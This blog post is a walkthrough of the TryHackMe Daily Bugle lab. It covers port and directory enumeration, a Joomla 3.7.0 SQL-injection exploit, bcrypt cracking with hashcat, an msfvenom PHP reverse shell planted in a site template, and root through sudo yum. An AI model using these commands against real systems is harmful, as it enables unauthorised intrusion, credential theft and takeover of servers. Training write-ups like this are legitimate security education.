<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="dark">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="TryHackMe Daily Bugle" />
<meta property="og:locale" content="en" />
<meta name="description" content="Solutions to CTFs and articles regarding cybersecurity." />
<meta property="og:description" content="Solutions to CTFs and articles regarding cybersecurity." />
<link rel="canonical" href="https://jason-kenyon.com/posts/daily_bugle/" />
<meta property="og:url" content="https://jason-kenyon.com/posts/daily_bugle/" />
<meta property="og:site_name" content="Jason’s Page" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-01-03T00:00:00-05:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="TryHackMe Daily Bugle" />
<meta name="twitter:site" content="@" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-01-03T00:00:00-05:00","datePublished":"2025-01-03T00:00:00-05:00","description":"Solutions to CTFs and articles regarding cybersecurity.","headline":"TryHackMe Daily Bugle","mainEntityOfPage":{"@type":"WebPage","@id":"https://jason-kenyon.com/posts/daily_bugle/"},"url":"https://jason-kenyon.com/posts/daily_bugle/"}</script>
<!-- End Jekyll SEO tag -->


  <title>TryHackMe Daily Bugle | Jason's Page
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="Jason's Page">
<meta name="application-name" content="Jason's Page">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="/assets/lib/fonts/main.css">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="/assets/lib/fontawesome-free/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="/assets/lib/tocbot/tocbot.min.css">
  

  
    <link rel="stylesheet" href="/assets/lib/loading-attribute-polyfill/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="/assets/lib/glightbox/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    <script defer src="/assets/lib/simple-jekyll-search/simple-jekyll-search.min.js"></script>
  

  
    <script defer src="/assets/lib/loading-attribute-polyfill/loading-attribute-polyfill.umd.min.js"></script>
  

  
    <script defer src="/assets/lib/glightbox/glightbox.min.js"></script>
  

  
    <script defer src="/assets/lib/clipboard/clipboard.min.js"></script>
  

  
    <script defer src="/assets/lib/dayjs/dayjs.min.js"></script>
  

  
    <script defer src="/assets/lib/dayjs/locale/en.js"></script>
  

  
    <script defer src="/assets/lib/dayjs/plugin/relativeTime.js"></script>
  

  
    <script defer src="/assets/lib/dayjs/plugin/localizedFormat.js"></script>
  









<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/me.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">Jason's Page</a>
    <p class="site-subtitle fst-italic mb-0">CTFs and Articles</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
    
    <a href="mailto: jas0nkenyon@protonmail.com" class="fa fa-envelope"></a>
    <a href="https://www.linkedin.com/in/jason-kenyon-8b063133b/" class="fa-brands fa-linkedin"></a>
    <a href="https://github.com/jas0nkenyon" class="fa-brands fa-github"></a>
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>TryHackMe Daily Bugle</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  

  
  

  

  
  

  

  
  

  




<!-- return -->










<article class="px-1" data-toc="false">
  <header>
    <h1 data-toc-skip>TryHackMe Daily Bugle</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735880400"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Jan  3, 2025
</time>

      </span>

      <!-- lastmod date -->
      

      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              <a href="https://github.com/jas0nkenyon# change to your GitHub homepage">Jason Kenyon</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="785 words"
>
  <em>4 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  

  <div class="content">
    <p><a href="/assets/img/daily_bugle/daily_bugle.png" class="popup img-link  shimmer"><img src="/assets/img/daily_bugle/daily_bugle.png" alt="" loading="lazy"></a></p>

<h1 id="information-gathering">Information Gathering</h1>
<p>We are instructed as follows:</p>

<blockquote>
  <p>Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.</p>
</blockquote>

<p>And we are given the target IP address <code class="language-plaintext highlighter-rouge">10.10.89.186</code>.</p>

<p>Our objectives are to</p>

<ol>
  <li>determine who robbed the bank,</li>
  <li>identify the version of Joomla running on the web server,</li>
  <li>obtain the user flag, and</li>
  <li>obtain the root flag.</li>
</ol>

<h1 id="enumeration">Enumeration</h1>
<p>We begin with an <code class="language-plaintext highlighter-rouge">nmap</code> scan <code class="language-plaintext highlighter-rouge">nmap -sS -T5 -sC -sV 10.10.89.186</code>, revealing</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre>PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
3306/tcp open  mysql   MariaDB 10.3.23 or earlier (unauthorized)
</pre></td></tr></tbody></table></code></div></div>

<p>Upon navigating to the web server on port <code class="language-plaintext highlighter-rouge">80/TCP</code>, the front-page article discloses that it was “Spider-Man” who
robbed the bank.</p>

<p>Fuzzing for directories with</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt 
-u http://10.10.121.232/FUZZ -ic
</pre></td></tr></tbody></table></code></div></div>
<p>yields</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td><td class="rouge-code"><pre>images                  [Status: 301, Size: 236, Words: 14, Lines: 8, Duration: 118ms]
                        [Status: 200, Size: 9259, Words: 441, Lines: 243, Duration: 223ms]
media                   [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 102ms]
templates               [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 102ms]
modules                 [Status: 301, Size: 237, Words: 14, Lines: 8, Duration: 98ms]
bin                     [Status: 301, Size: 233, Words: 14, Lines: 8, Duration: 99ms]
plugins                 [Status: 301, Size: 237, Words: 14, Lines: 8, Duration: 97ms]
includes                [Status: 301, Size: 238, Words: 14, Lines: 8, Duration: 99ms]
language                [Status: 301, Size: 238, Words: 14, Lines: 8, Duration: 98ms]
components              [Status: 301, Size: 240, Words: 14, Lines: 8, Duration: 100ms]
cache                   [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 100ms]
libraries               [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 98ms]
tmp                     [Status: 301, Size: 233, Words: 14, Lines: 8, Duration: 99ms]
layouts                 [Status: 301, Size: 237, Words: 14, Lines: 8, Duration: 102ms]
administrator           [Status: 301, Size: 243, Words: 14, Lines: 8, Duration: 95ms]
cli                     [Status: 301, Size: 233, Words: 14, Lines: 8, Duration: 104ms]
                        [Status: 200, Size: 9259, Words: 441, Lines: 243, Duration: 218ms]
</pre></td></tr></tbody></table></code></div></div>

<p>To determine the Joomla version, we happen upon the web page <a href="https://docs.joomla.org/How_to_check_the_Joomla_version%3F">https://docs.joomla.org/How_to_check_the_Joomla_version%3F</a>, which suggests that we visit the URL 
<code class="language-plaintext highlighter-rouge">http://10.10.89.186/languages/en-GB/en-GB.xml</code>. However, this endpoint does not exist; instead, we visit
<code class="language-plaintext highlighter-rouge">http://10.10.89.186/language/en-GB/en-GB.xml</code>, upon which we find</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>&lt;metafile version="3.7" client="site"&gt;
&lt;name&gt;English (en-GB)&lt;/name&gt;
&lt;version&gt;3.7.0&lt;/version&gt;
...
</pre></td></tr></tbody></table></code></div></div>

<p>Hence, we conclude that the web server is running Joomla version <code class="language-plaintext highlighter-rouge">3.7.0</code>.</p>

<h1 id="exploitation">Exploitation</h1>
<p>We find CVE-2017-8917 after some research. We also find a python implementation at <a href="https://github.com/XiphosResearch/exploits/tree/master/Joomblah">https://github.com/XiphosResearch/exploits/tree/master/Joomblah</a>.
Next, we clone the repository with<br />
<code class="language-plaintext highlighter-rouge">git clone https://github.com/XiphosResearch/exploits/tree/master</code>. Running
the exploit with <code class="language-plaintext highlighter-rouge">python3 joomblah.py http://10.10.89.186/</code> outputs</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com',
'$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
</pre></td></tr></tbody></table></code></div></div>

<p>To crack the hash, we create a file <code class="language-plaintext highlighter-rouge">hash.txt</code> and copy into it the hash <code class="language-plaintext highlighter-rouge">$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm</code>. We then go to the web page <code class="language-plaintext highlighter-rouge">https://hashes.com/en/tools/hash_identifier</code> and use the provided
tool to discover that the hash type is<br />
<code class="language-plaintext highlighter-rouge">bcrypt $2*$, Blowfish (Unix)</code>. By running <code class="language-plaintext highlighter-rouge">hashcat --help</code>, we find that
the hash mode for this hash is <code class="language-plaintext highlighter-rouge">3200</code>. Then, we pass the file, along with the <code class="language-plaintext highlighter-rouge">rockyou.txt</code> wordlist, to hashcat
to perform a dictionary attack with the command</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>hashcat <span class="nt">-D</span> 2 <span class="nt">-a</span> 0 <span class="nt">-m</span> 3200 hash.txt /usr/share/wordlists/rockyou.txt
</pre></td></tr></tbody></table></code></div></div>

<p>This quickly reveals Jonah’s cracked password.</p>

<p>With this password, we sign in to the Joomla administrative panel at <code class="language-plaintext highlighter-rouge">http://10.10.89.186/administrator</code> as
the user <code class="language-plaintext highlighter-rouge">jonah</code>, and we generate a php web shell using<br />
<code class="language-plaintext highlighter-rouge">msfvenom -p php/reverse_php -o shell.php LHOST=10.6.4.176</code>.</p>

<p>To upload the file, we navigate to the <code class="language-plaintext highlighter-rouge">Templates</code> tab and modify the Protostar
template by copying into <code class="language-plaintext highlighter-rouge">index.php</code> the contents from our shell, <code class="language-plaintext highlighter-rouge">shell.php</code>.</p>

<p><a href="/assets/img/daily_bugle/templates.png" class="popup img-link  shimmer"><img src="/assets/img/daily_bugle/templates.png" alt="" loading="lazy"></a></p>

<p>Afterward, we 
set up a netcat listener with <code class="language-plaintext highlighter-rouge">ncat -lvnp 4444</code> and navigate to <code class="language-plaintext highlighter-rouge">http://10.10.89.186/index.php</code>.
This gives us a shell as <code class="language-plaintext highlighter-rouge">apache</code>.</p>

<h1 id="post-exploitation">Post-Exploitation</h1>
<p>By executing <code class="language-plaintext highlighter-rouge">ls -al /home</code>, we notice that the only user with a home directory is <code class="language-plaintext highlighter-rouge">jjameson</code>, and that, unfortunately,
we do not have read access to <code class="language-plaintext highlighter-rouge">/home/jjameson</code>. Nevertheless, we find a file named <code class="language-plaintext highlighter-rouge">configuration.php</code> in the web root directory <code class="language-plaintext highlighter-rouge">/var/www/html</code>, which contains the line<br />
<code class="language-plaintext highlighter-rouge">public $password = 'DOITURSELF:)';</code>. This password allows us to sign in as <code class="language-plaintext highlighter-rouge">jjameson</code> with <code class="language-plaintext highlighter-rouge">ssh jjameson@10.10.89.186</code>. We are then able to capture the user flag:</p>

<p><a href="/assets/img/daily_bugle/user.txt.png" class="popup img-link  shimmer"><img src="/assets/img/daily_bugle/user.txt.png" alt="" loading="lazy"></a></p>

<p>Running <code class="language-plaintext highlighter-rouge">sudo -l</code>, we notice that we have sudo permissions for <code class="language-plaintext highlighter-rouge">yum</code> and use the the method demonstrated in part (b) 
of the article at <a href="https://gtfobins.github.io/gtfobins/yum/">https://gtfobins.github.io/gtfobins/yum/</a> to obtain a root shell. With this shell, we capture the root flag:</p>

<p><a href="/assets/img/daily_bugle/root.txt.png" class="popup img-link  shimmer"><img src="/assets/img/daily_bugle/root.txt.png" alt="" loading="lazy"></a></p>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/ctfs/">CTFs</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/tryhackme/"
            class="post-tag no-text-decoration"
          >tryhackme</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=TryHackMe%20Daily%20Bugle%20-%20Jason's%20Page&url=https%3A%2F%2Fjason-kenyon.com%2Fposts%2Fdaily_bugle%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=TryHackMe%20Daily%20Bugle%20-%20Jason's%20Page&u=https%3A%2F%2Fjason-kenyon.com%2Fposts%2Fdaily_bugle%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=https%3A%2F%2Fjason-kenyon.com%2Fposts%2Fdaily_bugle%2F&text=TryHackMe%20Daily%20Bugle%20-%20Jason's%20Page" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/skynet/">TryHackMe Skynet</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/daily_bugle/">TryHackMe Daily Bugle</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/tryhackme/">tryhackme</a>
      
    </div>
  </section>


            </div>

            
              
              







            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  
    










  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/skynet/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735534800"
  data-df="ll"
  
>
  Dec 30, 2024
</time>

              <h4 class="pt-0 my-2">TryHackMe Skynet</h4>
              <div class="text-muted">
                <p>Information Gathering

We are given:


  Deploy and compromise the vulnerable machine!


Additonally, we are given the target IP 10.10.13.83. Our objectives are as follows:


  Obtain Miles’ email ...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/skynet/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>TryHackMe Skynet</p>
    </a>
  

  
    <div class="btn btn-outline-primary disabled" aria-label="Newer">
      <p>-</p>
    </div>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

    
      <a href="https://github.com/jas0nkenyon# change to your GitHub homepage">Jason Kenyon</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/tryhackme/">tryhackme</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

